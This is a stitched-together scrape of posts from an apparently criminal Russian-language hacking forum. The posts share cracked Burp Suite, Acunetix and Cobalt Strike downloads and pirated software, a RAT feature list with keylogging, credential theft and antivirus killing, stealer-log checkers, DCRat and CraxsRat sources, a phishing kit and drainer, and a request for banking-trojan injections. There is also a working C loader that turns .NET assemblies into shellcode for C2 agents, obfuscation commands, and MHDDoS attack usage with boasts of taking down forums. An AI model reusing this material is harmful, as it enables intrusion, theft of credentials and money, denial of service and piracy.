https://www.ddosi.com/awvs14-3/
Если кто может поделиться работающей акушей, буду очень благодарен.
Заранее спасибо.
PrimeGUI - это инструмент конфиденциальности, который помогает вам защитить
ваш анонимат в Интернете, подобно GPA (Gnu Privacy Assistant). Он использует
два основных алгоритма: RSA 8192 и Crystals Kyber. RSA может шифровать только
текстовые сообщения, а Crystals Kyber также способен шифровать файлы,потому
что он шифрует с использованием AES 256, который теоретически безопасен от
атак квантовых компьютеров.Этот инструмент написан на языке программирования
Go.
Для аппаратной части я предложу 4 ГБ оперативной памяти, возможно, меньше, и
процессор Intel i5. В моем примере я тестировал генерацию RSA-ключа на
процессоре Intel® Celeron(R) CPU N2840 @ 2.16GHz × 2, на это ушло примерно от
половины минуты до минуты. Чем мощнее процессор, тем быстрее генерация ключей.
RSA с большими ключами может замедлить сетевое взаимодействие, потому что в
цепочках сертификатов это может заставить клиент/сервер тратить значительное
количество времени ЦП на проверку подписей, поэтому не рекомендуется для
серверного клиентского взаимодействия.
Итак, давайте поговорим о CRYSTALS Kyber. CRYSTALS Kyber использует механизм
капсулирования ключа (KEM), который используется для передачи симметричного
ключа между двумя сторонами с использованием асимметричных алгоритмов. В нашей
программе PrimeGUI я использовал AES256.
Вот диаграмма для краткого изложения и более подробного объяснения идеи:
Добро пожаловать, чтобы активировать новый BurpSuite (version 2.4) Откройте терминал И введите команды
apt-get install openjdk-11-headless
Скачать файл : https://mega.nz/file/JxFxTQIC#9bMYU5h_s6mVET1ELxlbnqI6_eq8U4MfQJ0F4m6lXAw
Войдите в папку с терминалом И введите команды :
java -Dfile.encoding=utf-8 -noverify -javaagent:burp-loader-keygen-2020_4.jar -jar burpsuite_pro_v2020.4.jar
Откройте другой терминал И введите команды : java -jar 2020_2_1-burp-loader- helper.jar
Скопируйте код активации
Остальная часть процесса стандартная, ручная активация и т. Д.
Прошу прощения за мой русский.
Кряк Netsparker от 10 июля 2020 года
Возможно кому то пригодится, на всякий случай проверьте на клей (ссылка копи
паст с рейдфорума)
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/uo1hQBBA#ILCZMM0mtJ8NsCqB0cWPsACCmlL3kSJ4ldMHnV-BwYw)
mega.nz
AWVS_14.2.210503151 cracked
update date: 4th May 2021
](https://anonfiles.com/Xf8cx8v3ud/AWVS_v14.2.210503151_www.ddosi.com_rar)
anonfiles.com
pass: www.ddosi.com
from dr.farfar
Code:Copy to clipboard
SHA256
Acunetix Premium Activation Tool.exe:
e279cd8f02606e45d7cdcd2762cb6ea885ed7e62b46bda89cad56d680e774d29
Acunetix Premium v14.2.210503151.exe:
a438e6f8a2746283df35f6b7c7ace3d6e5f4253c11dfa817c48f67910d0dbd72
Чет на гитхабе не нашел ничего подходящего (в глаза видимо долблюсь или вторые
сутки без сна), нужно отчекать диапазон на конкретную связку логин пасс
Что-то вроде даешь CIDR/список.тхт:port login:pass, чтобы он валиды отобрал,
обязательно под линукс, может грохать залогененых мне не критично
Как по мне лучший инструмент по подбору пароля, подбирает почти ко всему, очень гибкая настройка. Оценка 8/10 не хватает графического интерфейса а так норм
Hidden content for authorized users.
Spoiler: К чему можно подобрать пароль?
ищу АвтоОбзвонщик (AutoRingUP) версии 3.7.4+ желательно конечно 3.8.6.4(но ето было бы сильно круто)
Или что-то подобное для модема с голосовыми функциями чтоб дать объявление (воспроизвести звуковой файл) и распознать нажатие на клавишу (распознать тоновый сигнал)
Или какие-то хорошую программу декомпелятор чтоб попробовать вскрыть новый авторингап, изменить настройки так сказать в ручную попробовать крякнуть и собрать обратно
Данные исходники не были слиты нигде!
Исходы чисто для изучения. Не проверял работоспособность давно.
Думаю новичкам может пригодится.
](https://anonfiles.com/R4x4qah6z0/GachiChecker_rar)
anonfiles.com
Update
2.7.2
-Заменили сервис Indeed на eBay (все страны), проверяет кол-во ордеров и отзывы
-Исправили чек YouTube
-Исправили чек TikTok, также добавили чек TikTok ADS.
-Добавили чек Reddit ADS
-Добавили чек Twitter ADS
-Добавили чек Hypixel в Minecraft, также на Skins,Capes.
-Добавили получение текста и заголовка писем Gmail,Yahoo,Outlook
-Исправили LinkedIn
-Добавили проверку на баланс "В ожидании", исправили конвертацию баланса стима (иногда неверно парсил баланс)
-Добавили поддержку стиллера DCRat для утилит и Cookies чекера.
-Переработали CreditCards Searcher, добавили парсинг CVV если есть.
-Вернули сортер логов для Steam,Telegram,Wallets,FTP
Download: https://www.mediafire.com/file/92331potce7wxba/BLTools_v2.7.2+By+Twizzy.7z/file
Yet another CraxsRat/EagleSpy paste. At east the GUI looks somewhat cool
compared to the old ones.
Use in VM only !
Link: <https://mega.nz/file/yI1QAbSS#-LT-
_jy2G8BSe0-4uECfnI8dO9A1UJOHjhx3gh5Oftw>
pass: xss.is
Old but I didn't see this tool posted here yet
Brute force for Facebook accounts
Hidden content for authorized users.
](https://anonfiles.com/h9Q8wcA7oc/Facebook_Accounts_Checker_By_X-SLAYER_zip)
anonfiles.com
доброе ден товарищи сиваю вам ms drainer. Не последный версия но ест так и
ест.
Слив предложил niggabyte спс за это.
February 2021
Скачать:
You must spend at least 100 day(s) on the forum to view the content.
![dropmefiles.com](/proxy.php?image=https%3A%2F%2Fdropmefiles.com%2Fimages%2Fshare- logo_vk.png&hash=3f67b87028329be58fe8d4c73ccac7b9&return_error=1)
](https://dropmefiles.com/aodm2)
Share your pictures, send large videos, exchange music or transfer big files. No registration required. Unlimited upload/download speed.
dropmefiles.com
Посоветуйте бесплатный/крякнутый rat для приколов над кентами просто
Используется в работе, делюсь с комьюнити.
Spoiler: Пример использования
меняем --Seed и --Functions
код фудкции main переносим в _fake_main, сохраняем main в таком формате
C:Copy to clipboard
int main(){
return _fake_main();
}
Bash:Copy to clipboard
export TIGRESS_HOME=/dev/tigress/3.1
export PATH=$PATH:/dev/tigress/3.1
CIL_MACHINE="short=2,2 int=4,4 long=4,4 long_long=8,8 pointer=4,4 \
alignof_enum=4 float=4,4 double=8,8 long_double=12,12 \
void=1 bool=1,1 fun=1,1 alignof_string=1 max_alignment=16 \
size_t=unsigned_int wchar_t=int char_signed=true \
const_string_literals=true big_endian=false \
__thread_is_keyword=true __builtin_va_list=true \
underscore_name=true"; export CIL_MACHINE;
tigress-merge --gcc=i686-w64-mingw32-gcc main.cpp FileOpLock.cpp --out=full.c
tigress --gcc=i686-w64-mingw32-gcc --Seed=1523 --Environment=x86_64:Linux:Gcc:4.6 \
--Transform=Split \
--SplitCount=20 \
--SplitName=__super_fnc_ \
--SplitKinds=top,block,deep,recursive,level,inside \
--SplitLevel=30 \
--Functions=getbuffer,decrypt,_fake_main \
--Transform=RndArgs\
--RndArgsBogusNo=20 \
--Functions=getbuffer,decrypt,_fake_main,/.\*__super_fnc_.\*/,/.\*getarr.\*/ \
--Transform=Flatten \
--Functions=getbuffer,decrypt,_fake_main,/.\*__super_fnc_.\*/ \
--FlattenDispatch=switch,goto,indirect,call \
--FlattenSplitBasicBlocks=true \
--FlattenRandomizeBlocks=true \
--Transform=EncodeLiterals \
--Functions=getbuffer,decrypt,_fake_main,/.\*__super_fnc_.\*/ \
--Transform=EncodeArithmetic \
--Functions=getbuffer,decrypt,_fake_main,main,/.\*__super_fnc_.\*/ \
--out=obfuscated_main.c \
full.c -O0 -static -o result.exe
Acunetix Premium - v24.9.240924_080
<https://www.acunetix.com/changelogs/acunetix-premium/v24-9-1-on- prem-24-september-2024/>
acunetix_24.9.240924080.exe
acunetix_24.9.240924080_x64.shClick to expand...
https://send.exploit.in/download/3e3ad871b3f9eb81/#FWcdgMdDZ_U15M5P0if7Fg
Pass: xssis
Click to expand...
Download
Hidden content for authorized users.
WwW.Dr-FarFar.CoM.zip - AnonFiles ](https://anonfiles.com/v514y253o7/Instagram_Audiens_Extractor_And_Mention_Pro_v3.0_Full_Activated_- _WWW.Dr-FarFar.CoM_zip)
anonfiles.com
Viotto Binder
Join multiple files into one,
and create installation packages.
Free and open source, coded in VB6.
Viotto Binder is a free, open-source software installer.
Create simple, reliable installers.
Viotto Binder can install all the files of your application in the desired
folders.
Key Features:
Bind together any number and type of file into one executable
Function to compress each file separately before binding, using UPX packer
Tiny stub size: 12 kb
Compatible with any Windows! From WinXP to Win11, 32-64 bit
Native VB6, no extra dependencies required
Simple, compact, reliable and OpenSource.
Seven default drop paths, or custom path:
~ Application path (where dropper gets executed)
~ Temp
(Cocuments
and settingsUsernameLocal settingsTemp)
~ Root
(C
~ Windows (C:Windows)
~ System32 (C:Windowssystem32)
~ ProgramFiles (C:Program files)
~ AppData
(Cocuments
and settingsUsernameApplication Data)
~ Custom
<ссылка удалена модератором>
Доступен первый выпуск новой утилиты сканирования сетевых портов RustScan, оптимизированной для существенного увеличения скорости cканирования. Высокая скорость достигается благодаря интенсивному распараллеливанию проверок. В проведённых тестах время сканирования 65 тысяч портов составило всего 8 секунд при выполнении 10 тысяч одновременных проверок. Код проекта написан на языке Rust и распространяется под лицензией GPLv3. Готовые пакеты собраны для Debian. Следом опубликована модернизированная версия RustScan, в которой для запуска параллельных проверок вместо потоков использованы методы асинхронного программирования на базе библиотеки async-std.
RustScan ограничен только функциональностью проверки портов, и не поддерживает такие возможности как определение приложений и запуск NSE-скриптов для автоматизации различных дополнительных действий с выявленными открытыми портами. Для получения доступа к расширенным возможностям предусмотрена поддержка автоматического запуска nmap для выявленных открытых портов - в отличие от таких быстрых сканеров, как MassScan, RustScan позиционируется как своеобразный ускоритель nmap. Например, в конфигурации, в которой nmap потратил на сканирование 17 минут, RustScan выполнил сканирование за 8 секунд, а общее время выполнения работы с учётом вызова nmap для найденных портов составило 19 секунд.
• Source: https://github.com/brandonskerritt/RustScan
• Source: https://github.com/brandonskerritt/RustScan/releases/tag/1.1.0
Всем доброго времени суток!
Подскажите где можно найти софтец, чтоб переформатил номер телефона из (ххх)
ххх-хх-хх В 7хххххххххх.
Заранее благодарен!
З.Ы. Уже не надо) Excel справился
Кто подскажет достойный софт для чека мыло:пасс на линки ?
Спасибо заранее за дельные подсказки
Hello,
I do ask me always how it's possible to create an injection?
As I want to update and add many injections but have no clue how to do that.
For example my bank, BAWAG, I use the eBanking app which uses other
credentials then in the web eBanking. And Hook have this credentials from the
App.
How it's possible to create a html from an App? And what else do I need to do
afterwards? Does every injection works the same when creating one? Does an
injection html works on all Botnets?
Of course, iam asking mainly for Hook/Ermac, since Hook is out does some
Botnets just use the one from Hook and not creating new ones.
Of course i think it will be very time consuming.
Phoenix for example is different, the injections are all in the SQL db.
Leaked Octo is using older injections then hook does use.
Can anybody help me there please? Maybe we could then create in a team which
does create an up to date injections, well, just an idea, so we can help each
other.
I have time enough.
greetz
Доброго времени суток.
Ищу парсер данных с сайтов, с условием что данные постоянно обновляются, и
парсер при этом должен их собирать в лайв режиме.
Рассматриваю фри и платные варианты.
![](/proxy.php?image=https%3A%2F%2Fi.postimg.cc%2FxjmRGxph%2Fk-Qs- Ekq-Z-1.png&hash=8dd24eb4c5d937ee842988f751816b73)
Функционал:
Spoiler
HVNC:
- Fully Custom Build-IN Stable HVNC
- Completely Hidden Desktop Environment
- Windows 8-10+ Support
- Build in Hidden Browser Features
- Keyboard And Mouse Contror
HIDDEN BROWSER:
- Chrome Support
- Hidden Profile/Data Takeover
- Firewall Information
- Windows 7 Support
REMOTE DESKTOP:
- Keyboard And Mouse Controll
- Multi Display Support
- Interval Quality Options
- Update & Upload / Exicute
- Open Web URL
REMOTE WEBCAM:
- Select Webcam
- Size/Quality
ON-CONNECT:
- Start hVNC
- Auto Save Client Passwords
- Run Custom Script
CONTROL ALL:
- Update Miner Settings
- Update All Clients
- Run Custom Script
- Start hVNC
- Auto Save Client Passwords
- Run Custom Script
USER dаta:
- Get GEO Location
- Grab Server Information
- Firewall Information
DATA RECOVERY:
- 35+ Browser Passwords
- FTP Client Recovery
- Get Discord Tokens
- Advanced File Manager
DATA CAPTURE:
- Advanced Keylogging
- Logs Over Email
- Email Screenshots
- Email Password Recovery
- Email Keylogger Keywords
- Save Logs To Disk
- Clipboard Logs
- Keylogger Keywords
- Live Keylogging
MINER:
- Mine BTC/LTC on target machine.
- Full proxy configuration for miner.
- Opton To Choose GPU:CPU:SILENT
BUILDER:
- .Net 4.0 / .Net 2.0
- Adcanced File Binding
- Icon Selection
- Assembly Cloner
- Advanced Assembly
- Hide/Melt File
- Extenstion Spoofer
- Execution Deley
- Custom Source Execution
- Password Protection
- Ganarate Mutex
- Delete ZoneID
PERSISTENCE:
- Persistence
- Process Protection
- Process Persistence
- Startup Persistence
- Startup
- Hidden Startup
- UAC Bypass
- Disable Taskbar
- Show/Hide Taskbar
- Show/Hide Tray
- Hide all Windows
- AntiVM/AntiSandbox
- Advanced Startup
- Kill Antivirus
- Disable RegEdit
MISC:
- Process Manager
- Remote Shell
- Registry Manager
- Listen On Startup
- Connect Notifications
- Server Actions
- Fun Options
- Gzip Compression
- Play Frequency
- Client Map
- Print Text
- Software Settings
- Client Grid
- History
Скачать:
ВНИМАНИЕ: СОФТ НА СКЛЕЙКУ НЕ ПРОВЕРЯЛСЯ!
Hex-Rays IDA Pro 7.3.190614 x64
<http://www.mediafire.com/file/s1e4mpbgjluynnw/Hex- Rays_IDA_Pro_7.3.190614_x64.rar/file[LIKES> = 20] [/ LIKES]
Hidden content for authorized users.
WwW.Dr-FarFar.CoM.zip - AnonFiles ](https://anonfiles.com/JcE6ha53o6/Internet_Download_Manager_v6.37_Build_14_Full_Multilingual_Incl_- _WwW.Dr-FarFar.CoM_zip)
anonfiles.com
Мне всегда нравился пончик и, в особенности, его возможности по созданию шеллкодов из сборок .NET. К сожалению, из-за высокой популярности фреймворка его встроенный бутстрап (загрузчик) стал узнаваем многими антивирусными решениями — это особенно критично при использовании долгоиграющих полезных нагрузок, которые подразумевают продолжительное нахождение в памяти, например, агенты Цэ2. В этом случае, даже если сам процесс инжекта проходит нормально, первое же сканирование памяти по планировщику алертнет о заражении.
Поэтому было решено реимплементировать вышеуказанную функциональность в отдельный инструмент, дабы продолжать извлекать выгоду из безфайлового позиционно-независимого запуска приложений на C#.
Примечание: шаблон для генератора заимствует много кода из open source проектов с GitHub, однако считаю, что условиям конкурса он не противоречит, т. к. на выходе имеем a) авторский продукт, b) в итоговом виде ранее не встречавшийся в паблике, c) целевое предназначение которого, на мой взгляд, очень актуально на данный момент для тех, кто в теме.
Click to expand...
Дисклеймер** :** все материалы из этой статьи — только для учебных целей; автор не несет ответственности за любое их неправомерное использование.
Click to expand...
Принудительный хостинг CLR
Чтобы запустить .NET приложение из памяти, нужен рантайм (CLR) управляемого кода. Загрузить рантайм и передать ему байт-код можно из любого неуправляемого процесса с помощью нескольких методов WinAPI. На этой простой концепции основаны однотипные модули множества разных C2, обычно называемые их авторами по типу executeassembly*.
Два отдельных проекта, дающих хорошее понимание того, как добиться загрузки CLR — это HostingCLR (PoC) и InMemoryNET (вооруженный PoC).
Краткое описание используемых апи и интерфейсов в стиле "Explain Like I'm Five":
mscoree.dll!CLRCreateInstance
— отдает интерфейс ICLRMetaHost
.ICLRMetaHost::GetRuntime
— отдает интерфейс ICLRRuntimeInfo
.ICLRRuntimeInfo::IsLoadable
— проверяет, может ли рантайм требуемой версии (обычно это v4.0.30319
) быть загружен в текущий процесс.ICLRRuntimeInfo::GetInterface
— отдает интерфейс ICLRRuntimeHost
.ICLRRuntimeHost::Start
— собственно, загружает рантайм в текущий процесс.ICLRRuntimeHost::GetDefaultDomain
— отдает базовый COM-интерфейс IUnknown
для запроса домена приложения.IUnknown::QueryInterface
— отдает домен приложения по умолчанию.oleaut32.dll!SafeArrayCreate
— размещает байт-код сборки .NET в специальной структуре, которую требует метод Load_3
домена приложения, для загрузки сборки.AppDomain.Load
, Assembly.EntryPoint
— загружает сборку в память и отдает адрес точки входа в виде указателя MethodInfo
.oleaut32.dll!SafeArrayCreateVector
, oleaut32.dll!pSafeArrayPutElement
— танцы с бубном вокруг передачи требуемых сборкой аргументов на точку входа.MethodInfo.Invoke
— запуск сборки.В коде это выглядит примерно так:
C:Copy to clipboard
ICLRMetaHost* pMetaHost = NULL;
ICLRRuntimeInfo* pRuntimeInfo = NULL;
ICorRuntimeHost* pRuntimeHost = NULL;
IUnknown* pAppDomainThunk = NULL;
AppDomain* pDefaultAppDomain = NULL;
SAFEARRAY* pSafeArray = NULL;
Assembly* pAssembly = NULL;
MethodInfo* pMethodInfo = NULL;
int bLoadable = 0;
void* pvData = NULL;
HRESULT result = pCLRCreateInstance(&xCLSID_CLRMetaHost, &xIID_ICLRMetaHost, (LPVOID*)&pMetaHost);
if (FAILED(result)) goto cleanup;
WCHAR CLR_Version[] = { L'v',L'4',L'.',L'0',L'.',L'3',L'0',L'3',L'1',L'9', 0 };
result = pMetaHost->lpVtbl->GetRuntime(pMetaHost, CLR_Version, &xIID_ICLRRuntimeInfo, (LPVOID*)&pRuntimeInfo);
if (FAILED(result)) goto cleanup;
result = pRuntimeInfo->lpVtbl->IsLoadable(pRuntimeInfo, &bLoadable);
if (FAILED(result) || !bLoadable) goto cleanup;
result = pRuntimeInfo->lpVtbl->GetInterface(pRuntimeInfo, &xCLSID_CorRuntimeHost, &xIID_ICorRuntimeHost, (LPVOID*)&pRuntimeHost);
if (FAILED(result)) goto cleanup;
result = pRuntimeHost->lpVtbl->Start(pRuntimeHost);
if (FAILED(result)) goto cleanup;
result = pRuntimeHost->lpVtbl->GetDefaultDomain(pRuntimeHost, &pAppDomainThunk);
if (FAILED(result)) goto cleanup;
result = pAppDomainThunk->lpVtbl->QueryInterface(pAppDomainThunk, &xIID_AppDomain, (LPVOID*)&pDefaultAppDomain);
if (FAILED(result)) goto cleanup;
SAFEARRAYBOUND rgsabound[1];
rgsabound[0].cElements = 31337;
rgsabound[0].lLbound = 0;
pSafeArray = pSafeArrayCreate(VT_UI1, 1, rgsabound);
result = pSafeArrayAccessData(pSafeArray, &pvData);
if (FAILED(result)) goto cleanup;
my_memcpy(pvData, ASSEMBLY, 31337);
result = pSafeArrayUnaccessData(pSafeArray);
if (FAILED(result)) goto cleanup;
result = pDefaultAppDomain->lpVtbl->Load_3(pDefaultAppDomain, pSafeArray, &pAssembly);
if (FAILED(result)) goto cleanup;
result = pAssembly->lpVtbl->EntryPoint(pAssembly, &pMethodInfo);
if (FAILED(result)) goto cleanup;
VARIANT retVal; ZeroMemory(&retVal, sizeof(VARIANT));
VARIANT obj; ZeroMemory(&obj, sizeof(VARIANT));
obj.vt = VT_NULL;
VARIANT vtPsa;
vtPsa.vt = (VT_ARRAY | VT_BSTR);
SAFEARRAY* psaStaticMethodArgs = pSafeArrayCreateVector(VT_VARIANT, 0, 1);
WCHAR argv[3][5] = { {L'a',L'r',L'g',L'1', 0}, {L'a',L'r',L'g',L'2', 0}, {L'a',L'r',L'g',L'3', 0} };
vtPsa.parray = pSafeArrayCreateVector(VT_BSTR, 0, 3);
for (long i = 0; i < 3; i++) pSafeArrayPutElement(vtPsa.parray, &i, pSysAllocString(argv[i]));
long idx[1] = { 0 };
pSafeArrayPutElement(psaStaticMethodArgs, idx, &vtPsa);
result = pMethodInfo->lpVtbl->Invoke_3(pMethodInfo, obj, psaStaticMethodArgs, &retVal);
if (FAILED(result)) goto cleanup;
Позиционно-независимый код
Как уже было сказано, эта техника стара как мир, и доступна в виде многих открытых проектов. Более интересной и актуальной задачей является компиляция такого загрузчика в позиционно-независимый код или, по-простому, шеллкод.
Особенности, которые были приняты во внимание во время решения этой задачи:
.text
..data
) в обход оптимизаций компилятора.Примечание: два крайних пункта в этом релизе не представлены, ибо приват. Однако допилить это обычно не составляет труда.
Click to expand...
Есть много шаблонов, упрощающих PIC-разработку, но для небольших проектов вроде этого достаточно подхода ParanoidNinja , при котором исходный код пишется на C, компилируется без stdlib и линкуется с выравниванием стека для graceful-возвращения из шеллкода: <https://bruteratel.com/research/feature- update/2021/01/30/OBJEXEC/>.
CLRify. XSS Edition
Зависимости:
Bash:Copy to clipboard
apt install -y nasm g++-mingw-w64-x86-64 mono-devel python3
Протестировано на Ubuntu 22.04.3 LTS с компилятором
x86_64-w64-mingw32-gcc (GCC) 10-win32 20220113
и на Kali 2022.4 с
компилятором x86_64-w64-mingw32-gcc (GCC) 12-win32
.
Проект представляет из себя шаблон на C, аккомпанируемый скриптом на Петухоне, который реплейсит затычки и рисует красивый скрипткидди-стайл баннер.
Структура
Пример № 1. Создание шеллкода из тестовой сборки с аргументами:
Bash:Copy to clipboard
mono-csc /t:exe /out:TestAssembly.exe TestAssembly/TestAssembly.cs
./CLRify.py TestAssembly.exe arg1 arg2 arg3
nasm -f win64 TestAssembly/testShellcode.asm -o testShellcode.o
x86_64-w64-mingw32-ld testShellcode.o -o testShellcode.exe
Пример 1
Пример № 2. Создание шеллкода из тестовой сборки без аргументов:
Bash:Copy to clipboard
mono-csc /t:exe /out:TestAssembly.exe TestAssembly/TestAssemblyNoArgs.cs
NARGS=1 ./CLRify.py TestAssembly.exe
nasm -f win64 TestAssembly/testShellcode.asm -o testShellcode.o
x86_64-w64-mingw32-ld testShellcode.o -o testShellcode.exe
Пример 2
Сам инжектор в проект не включен по очевидным причинам: каждый специалист пользуется тем, что ему удобно + от способа инъекции поведение не зависит.
Ссылочки
Пароль от архива — xss.is
. За сим все, задавайте ваши ответы
Спамер в телеграм чаты. Спамит последнее смс с избранного, прост в использовании.
Требуется питон 3
После того, как установили питон 3,заходим в командную строку cmd и
прописываем в ней команду "pip install telethon" либо же "pip3 install
telethon" это если у вас уже был установлен питон старой версии, но нам нужен
питон 3.после всей этой процедуры создайте папку и закинь те в неё сам спамер,
откройте и он за требует такие данные, как - апи айди, апи хеш, номер и код
подтверждения
от акаунта эти данныe берём отсюда http://my.telegram.org. Нажимаете кнопку
Enter
спам запущен,для последующего спама необходимо всего лишь открыть спамер и
нажать энтер.
Советую называть папку именем акаунта, что бы не путать в дальнейшем
Here is the original master zip that contains all the NSA tools released by Shadow Brokers. It's quite interesting to decompile these programs, run them through Ghidra (reverse engineering) and generally have a deep dive into the workings of them. I hope you have as much fun with these as I have!
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Вот оригинальный мастер-zip, который содержит все инструменты АНБ, выпущенные Shadow Brokers. Довольно интересно декомпилировать эти программы, запускать их через Гидору (обратное проектирование) и, как правило, глубоко погружаться в их работу. Я надеюсь, что вам будет так же весело с ними, как и мне!
A scraper that can extract Email id , username , meta tags , name.
ps: i searched Github but didn't find any email scraper.
Hidden content for authorized users.
![send.exploit.in](/proxy.php?image=https%3A%2F%2Fsend.exploit.in%2Fsend- fb.358d4b57.jpg&hash=824ffe54bac782fbc1c2b7f04639d4b7&return_error=1)
](https://send.exploit.in/download/481635fcf9cf1127/#-t3kATsNH6gm81PbZstUKA)
Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.
send.exploit.in
pass:xss.is
Так-как автор продолжает играть умственно-отсталого, а сорцы я купил
![gofile.io](/proxy.php?image=https%3A%2F%2Fgofile.io%2Fdist%2Fimg%2Flogo- small-og.png&hash=32429581fada6ae1887e27dfa99f76aa&return_error=1)
](https://gofile.io/d/m92K2F)
Gofile is a free, secure file sharing and storage platform. With unlimited bandwidth and storage, you can easily store and share files of any type without any limits. Our advanced features, such as CDN support and password protection, make Gofile the ideal choice for individuals and businesses...
gofile.io
Code:Copy to clipboard
Operation types
+--------------------------------------------+
| Priority | Operator | Description |
|--------------------------------------------|
| 1 | + | unary plus |
| 1 | - | unary minus |
| 1 | ~ | bit NOT |
| 1 | ! | logical NOT |
|----------+------------+--------------------|
| 2 | * | mul |
| 2 | / | div |
| 2 | % | mod |
|----------+------------+--------------------|
| 3 | + | add |
| 3 | - | sub |
|----------+------------+--------------------|
| 4 | << | shift Left |
| 4 | >> | shift Right |
| 4 | <<< | roL |
| 4 | >>> | roR |
|----------+------------+--------------------|
| 5 | < | less |
| 5 | > | great |
| 5 | <= | less or equ |
| 5 | >= | great or equ |
|----------+------------+--------------------|
| 6 | == | equ |
| 6 | != | not equ |
|----------+------------+--------------------|
| 7 | & | bit AND |
|----------+------------+--------------------|
| 8 | ^ | bit XOR |
|----------+------------+--------------------|
| 9 | | | bit OR |
|----------+------------+--------------------|
| 10 | && | logical AND |
|----------+------------+--------------------|
| 11 | || | logical OR |
+--------------------------------------------+
Operand types
+--------------------------------+
| Base | Example |
|--------------------------------|
| 2 | 0b11111111, 11111111b |
|------+-------------------------|
| 8 | 0377, 377o |
|------+-------------------------|
| 10 | 1337, 1337d |
|------+-------------------------|
| 16 | 0xDeAdBeEf, 0BADC0DEh |
+--------------------------------+
Other
+---------------------------------------------+
| Brackets | (1*(2-3/4)+5*((6-7)*8+9)/10) |
+---------------------------------------------+
Калькулятор выражений со скобками. Писал для личных нужд. Only x64
Тесты приветствуются
Доброго времени суток! у меня такой вопрос по софту возможно кто то знает как
профиксить это. Сервер 20 ядер 40 потоков зеон 2680, инет 700мбит.
запускаю 3 окна программы NLBrute 1.2 задаю 5000 потоков для каждого окна,
сервер нагружен на 15-20 процентов, оперативы 60гб свободной висит инета
16мбит только используется, по при этом рабочие реальные потоки в каждом окне
500-700 скачет, в чем может быть проблема, почему не подымаются потоки выше?
(на предыдущем сервере подымались до 2500 потоков скаждого окна)
Скрин прилагаю.
Всем привет!
Вот решил недавно сделать софт, который собирает прокси с разных сайтов.
Надеюсь, новичкам программа будет полезна, ну или тем у кого нет денег на
прокси !
Что делает программа ?
1. Сбор прокси с 3 разных сайтов
2. Чекает на валидность прокси
Ввод формата прокси примает(это когда пишешь Checker): http, https, socks4,
socks5 - иное будет не работать
Софт полностью асинхронный, так что есть скорость сбора и чека. Написан на python и собран Nuitka(бесплатной версией), так что кто умеет реверсить велком
Прошлая статья по боту, которые уникализирует фото и видео + сбор архива -
https://xss.is/threads/83168/
Если хочешь поддержать создание бесплатных ботов, то подписывайся на мой канал
это стимулирует создавать новое для вас:
![t.me](/proxy.php?image=https%3A%2F%2Fcdn5.cdn- telegram.org%2Ffile%2FoB_5D83nfRqf3a1hzqTeO9QVit-KioH2wjDs_aE- rUnp0uqEYgVkGuPNMnZPoLASPC6_wakn9yXFWHgslEGTdZAtKxKVSy_ozQ6p8z7qLaNssZjcAZGDUxgPT_N_o0RVLrRThD9GzcZeRxOmawBV- ztXCOfPydmZ9nIJDRNk4uEV6Erdo7DOKApHfShzW9AtLWzPrmQ7nucyip- qkCf3B81t520gHZbGwtBDf44kNBHkOycHd9SpQgc9bJkXceKmU9QWAHDs01jGnsu3FrRS06dxEAwg01Kr4rvW5bV5gf98_q5_QzfZtA6eV- lvkt6I5eAL0A0-eldROS4dEB874g.jpg&hash=e98aee4bff2ac7ae103ef7f83a308daf&return_error=1)
t.me
Скачать:
https://drive.google.com/file/d/1RRQaW7NnRaXvXQHXIFU1giKmMQcM0sTg/view?usp=sharing
Вылаживаю код фиша под BNB Smart Chain Explorer
Может кому пригодиться
Важно -данный фиш я выкачал ,я не его создатель,нужно изменить код ,чтобы
он стучал вам
You must have at least 15 reaction(s) to view the content.
Добрый день! Хотел поинтересоваться, есть ли тут владельцы или пользователи такого чудного криптора, как Aliencrypter? Что-то много мнений о нем в интернете гуляет) Действительно ли хорош и стоит ли покупать? Цена смутила просто)
New version of burp suite with awesome features
more info: https://portswigger.net/burp/releases
burpsuite_pro_v2020.8 .jar
SHA256: 6bee15e064c279645ac5bb7cd5bbb51467a31f5d2b023e045cde83034001c37f
MD5: 16f0523e54335ae18989aaa898674c13
Virustotal:655d6651f2179d84343c9eee19829a53949f8b1f3e167fa5d45855aa5dc8ff03
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/fPJX3IbR#J25pLrhIz6wRrERhaoV8_2vqwrHEJmURGrzT-Vao2l8)
mega.nz
Best most accurate 350$ Mail Access checker
How to use?
1: Download the file extract it into folder
2: open "files" folder and extract the 3 archives at the same place
password:
$pkzip2$10125a0bf627a0046cdd70f73946f00d713a*f191cdb12aaeb5f42a0deea^NOT_SUPPORTED_HASH
Click to expand...
3: Open "app-win" as administrator and a black screen will be shown
4: Then open "EmailSoftware" at last the software will update itself and then
start working.
Hidden content for authorized users.
MHDDoS
MHDDoS**- Скрипт для Осуществления DDoS(ru.wikipedia.org/wiki/DoS-атака)
атаки, довести сервер до отказа в обслуживании.**
Скрипт имеет 36 методов атаки:https://github.com/MHProDev/MHDDoS
Метод CFB - может пробить даже CloudFlare.
Установка
**$ git clone **
With 36 Method ](https://github.com/MHProDev/MHDDoS)
Best DDoS Attack Script Python3, Cyber Attack With 36 Method - GitHub - MHProDev/MHDDoS: Best DDoS Attack Script Python3, Cyber Attack With 36 Method
github.com
$ cd MHDDoS
$ pip3 install icmplib requests pysocks cfscrape scapy
**$**python3 start.py CFB(метод атаки) https://example.ru(цель) 1 1000
socks5.txt 1000 100(время)
Кстати с помощью этого скрипта ломали сервера крупного форума(forumteam) - не
реклама
И даже форум социальной инженерии(lolz) - не реклама
check-host.net/check-report/f58a97kafe - не реклама(forumteam)
check-host.net/check-report/f5a685kbcb - не реклама(lolz)
Cobalt strike v 4.8 cracked by uCare
Download from official crack source :
official telegram : https://web.telegram.org/k/#@Pwn3rzs
official post : https://cyberarsenal.org/resources/cobalt-strike.39/
Or Download from Attachment : password for attachment : 0x43rypt0n
Don't run this on your own machine instead run it on windows server RDP to run the client and use WSL / ubuntu to run the teamserver
Running teamserver using WSL
Всех приветствую , сливаю исходник craxs rat https://fex.net/ru/s/pmoofxl , надеюсь на реакции , язык программирование C#
